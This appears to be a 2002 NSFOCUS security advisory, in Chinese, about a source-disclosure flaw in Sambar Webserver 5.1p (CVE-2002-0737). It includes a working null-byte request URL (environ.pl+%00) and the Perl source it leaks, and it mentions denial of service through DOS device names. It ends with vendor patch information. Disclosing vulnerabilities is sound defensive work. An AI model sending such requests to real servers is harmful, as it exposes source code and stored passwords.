首页 -> 安全研究

安全研究

安全漏洞
Sambar WEB服务程序服务端文件解析可绕过漏洞

发布日期:2002-04-17
更新日期:2002-04-19

受影响系统:
Sambar Webserver V5.1p
    - Microsoft Windows 2000
描述:
BUGTRAQ  ID: 4533
CVE(CAN) ID: CVE-2002-0737

Sambar Webserver是一款多线程的 HTTP 服务器,可使用于Windows、Unix、Linux操作系统下。

Sambar Webserver在服务端URL解析处理中存在漏洞,远程攻击者可以获得请求文件源代码信息。

攻击者可以向Sambar Webserver提交任何文件请求并在文件名后追加空格和NULL字符,可以导致Sambar Webserver返回包含请求文件源代码信息,可能导致密码等敏感的信息泄露。

攻击者同样可以请求DOS设备名进行拒绝服务攻击。

<*来源:Peter Gründl (pgrundl@kpmg.dk
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0222.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Peter Gründl (pgrundl@kpmg.dk)提供了如下测试方法:

请求如下URL:

http://server/cgi-bin/environ.pl+%00

可导致泄露如下信息:

read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print< GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO: $ENV{'PATH_INFO'}
PATH_TRANSLATED: $ENV{'PATH_TRANSLATED'}
QUERY_STRING: $ENV{'QUERY_STRING'}
REMOTE_ADDR: $ENV{'REMOTE_ADDR'}
REMOTE_HOST: $ENV{'REMOTE_HOST'}
REMOTE_USER: $ENV{'REMOTE_USER'}
REQUEST_METHOD: $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME: $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI: $ENV{'DOCUMENT_URI'}
SCRIPT_NAME: $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME: $ENV{'SCRIPT_FILENAME'}
SERVER_NAME: $ENV{'SERVER_NAME'}
SERVER_PORT: $ENV{'SERVER_PORT'}
SERVER_PROTOCOL: $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE: $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH: $ENV{'CONTENT_LENGTH'}
CONTENT: $CONTENT
END

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

Sambar
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

下载最新程序5.2B版本:

http://sambar.dnsaloas.org/win32-preview.tar.gz

浏览次数:3194
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障